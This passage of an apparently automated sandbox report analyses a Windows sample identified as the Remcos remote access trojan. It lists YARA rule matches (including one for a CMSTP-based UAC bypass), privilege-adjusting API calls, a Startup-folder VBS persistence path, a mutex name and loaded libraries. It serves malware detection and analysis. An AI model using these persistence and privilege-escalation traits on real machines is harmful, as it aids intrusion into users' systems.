                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@6/7@0/1
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EA06A GetLastError,FormatMessageW,0_2_008EA06A
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008D81CB AdjustTokenPrivileges,CloseHandle,0_2_008D81CB
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008D87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008D87E1
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_2_00416AB7
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006281CB AdjustTokenPrivileges,CloseHandle,1_2_006281CB
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_006287E1
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_008EB3FB
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008FEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_008FEE0D
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EC397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_008EC397
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00884E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00884E89
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419BC4
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeFile created: C:\Users\user\AppData\Local\MilburrJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-R1T905
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeFile created: C:\Users\user\AppData\Local\Temp\autE914.tmpJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 7056ZCiFdE.exeReversingLabs: Detection: 55%
                Source: 7056ZCiFdE.exeVirustotal: Detection: 66%
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeFile read: C:\Users\user\Desktop\7056ZCiFdE.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\7056ZCiFdE.exe "C:\Users\user\Desktop\7056ZCiFdE.exe"
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeProcess created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\Desktop\7056ZCiFdE.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\AppData\Local\Milburr\Allene.exe"
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeProcess created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\Desktop\7056ZCiFdE.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\AppData\Local\Milburr\Allene.exe" Jump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_009D9A50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_009D9A50
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E848F push FFFFFF8Bh; iretd 0_2_008E8491
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008AE70F push edi; ret 0_2_008AE711
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008AE828 push esi; ret 0_2_008AE82A
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A8945 push ecx; ret 0_2_008A8958
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008AEAEC push edi; ret 0_2_008AEAEE
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008AEA03 push esi; ret 0_2_008AEA05
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004567E0 push eax; ret 1_2_004567FE
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00455EAF push ecx; ret 1_2_00455EC2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00433FF6 push ecx; ret 1_2_00434009
